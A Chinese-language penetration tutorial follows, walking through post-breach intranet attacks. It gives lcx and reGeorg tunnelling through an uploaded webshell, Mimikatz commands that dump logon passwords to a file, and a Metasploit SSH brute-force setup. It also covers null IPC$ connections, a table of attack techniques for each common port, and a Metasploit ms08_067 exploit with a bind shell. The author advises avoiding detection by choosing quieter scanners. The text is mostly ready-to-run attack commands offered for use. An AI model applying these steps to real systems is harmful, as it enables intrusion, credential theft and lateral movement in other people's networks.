目录
1.代理
2.内网命令
3.抓密码
4.ipc$共享目录利用
5.端口漏洞
6.溢出
1.代理
端口转发工具有很多比如:rebind2 eDuh ssock reDuh lcx socks5 等……..
下面介绍我比较喜欢的2款工具LCX+ socks5
1.lcx
路由器加端口 TCP协议 ,固定IP地址本机
大马设置
Local Ip : 转发ip
Local Port : 转发端口
Remote Ip :本机ip (ip138.com外网ip)
Remote Port : 路由器上面设置的端口
Lcx上面执行:
lcx.exe -listen 3839 38390
2.reGeorg + proxifier
SOCKS:下载地址: https://github.com/sensepost/reGeorg
配置文件
Vim /etc/proxychains.conf
添加socks5 127.0.0.1 8090 (端口和监听端口要一样)
使用方法:
python reGeorgSocksProxy.py -u http://xxx.com/sk5.php -p 8090
上传一个脚本(asp,php,jsp,ashx)到webshell上
这些reGeorgSocksProxy.py脚本,监听shell端口
Win下面使用proxifier连接
配置文件-代理服务
Ip地址设置kali本机ip
2.内网常用的命令
ipconfig /all
查询ip判断有没有域服务,ps:大型网络一般都有dns服务器域。
net view /domain,我们可以知道有1个域。
Net view
查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来
可以参考以下是经用的内网渗透命令:
3. 抓密码
Mimikatz
下载地址:https://github.com/gentilkiwi/mimikatz
第一条:privilege::debug //提升权限
第二条:sekurlsa::logonpasswords //抓取密码
记录 Mimikatz输出:
第一条:””privilege::debug”” “”log sekurlsa::logonpasswords full”” exit && dir
将输出导入到本地文件:
第二条:””privilege::debug”” “”sekurlsa::logonpasswords full”” exit >> log.txt
SAMInside
这款工具有利有弊:
- 有时候抓不出密码,安全环境。(弊)
- 抓出的密码有时候破解网站破解不出SAMInside工具是跑密码表,一般都可以破解。
抓出来的密码可以使用爆破工具扫描。。。。。PS(首先要知道里面有流量监控,防火墙?)
推荐使用:
Linux metasploit
use auxiliary/scanner/ssh/ssh_login 选择ssh口令猜解模块
set RHOSTS 192.168.1.105 扫描的ip地址
set USERNAME root 扫描的用户名为root
set PASS_FILE/root/password.txt 设置字典
set THREADS 20 设置线程根据实际情况设置
show options 查看设置信息
run 开始扫描
win推荐使用ntscan扫描速度非常快
4.ipc$共享目录
使用命令 net use url=file://\\IP\ipc$\\IP\ipc$ “” /user:”” 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。(来源百度)
利用工具 流光,DTools 的IPC$探测功能,可进行扫描(ps:建议摸清楚内网有没有监控)
或者使用 \\可以查询管理员链接过那一台服务器
\\192.168.0.77
\\192.168.0.77\c$ (进入c盘)
或者网络处查看
Ps:(真实案例)
我通过tomcat拿到了一台服务器,但是那一台服务器密码不通杀,我什么扫描192.168.x.x所有网站,只扫描出几个都是一些路由器,tomcat(没有弱口令),我通过tomcat的一台共享ipc$拿下的服务器。
5.端口漏洞
| 端口号 | 端口说明 | 攻击技巧 |
|---|---|---|
| 21/22/69 | ftp/tftp:文件传输协议 | 爆破\嗅探\溢出\后门 |
| 22 | ssh:远程连接 | 爆破OpenSSH;28个退格 |
| 23 | telnet:远程连接 | 爆破\嗅探 |
| 25 | smtp:邮件服务 | 邮件伪造 |
| 53 | DNS:域名系统 | DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙 |
| 67/68 | dhcp | 劫持\欺骗 |
| 110 | pop3 | 爆破 |
| 139 | samba | 爆破\未授权访问\远程代码执行 |
| 143 | imap | 爆破 |
| 161 | snmp | 爆破 |
| 389 | ldap | 注入攻击\未授权访问 |
| 512/513/514 | linux r | 直接使用rlogin |
| 873 | rsync | 未授权访问 |
| 1080 | socket | 爆破:进行内网渗透 |
| 1352 | lotus | 爆破:弱口令\信息泄漏:源代码 |
| 1433 | mssql | 爆破:使用系统用户登录\注入攻击 |
| 1521 | oracle | 爆破:TNS\注入攻击 |
| 2049 | nfs | 配置不当 |
| 2181 | zookeeper | 未授权访问 |
| 3306 | mysql | 爆破\拒绝服务\注入 |
| 3389 | rdp | 爆破\Shift后门 |
| 4848 | glassfish | 爆破:控制台弱口令\认证绕过 |
| 5000 | sybase/DB2 | 爆破\注入 |
| 5432 | postgresql | 缓冲区溢出\注入攻击\爆破:弱口令 |
| 5632 | pcanywhere | 拒绝服务\代码执行 |
| 5900 | vnc | 爆破:弱口令\认证绕过 |
| 6379 | redis | 未授权访问\爆破:弱口令 |
| 7001 | weblogic | Java反序列化\控制台弱口令\控制台部署webshell |
| 80/443/8080 | web | 常见web攻击\控制台爆破\对应服务器版本漏洞 |
| 8069 | zabbix | 远程命令执行 |
| 9090 | websphere控制台 | 爆破:控制台弱口令\Java反序列 |
| 9200/9300 | elasticsearch | 远程代码执行 |
| 11211 | memcacache | 未授权访问 |
| 27017 | mongodb | 爆破\未授权访问 |
转网络
6.溢出
当通过VPN进入内网web搞不定,可以试试系统漏洞,内网补丁很少的情况下可以试试远程溢出。
推荐2个exp网站:
https://www.exploit-db.com/
https://www.kernel-exploits.com/
扫描漏洞我们可以通过nmap或者Nessus扫描内网漏洞,推荐使用nmap,Nessus扫描动静太大容易发现。
案例:仅供参考(ps:这个是好久以前搞的一台内网)
使用Metasploit
use exploit/windows/smb/ms08_067_netapi 加载漏洞模块
set LHOST 本机IP
set RHOST 目标ip
set payload windows/shell_bind_tcp payload
show options 看看有没有什么设置错误的地方。
Exploit 攻击
====================邪恶的分割线============================
科普型文章,用了很多工具和网上方法,如有问题请大牛指点!!!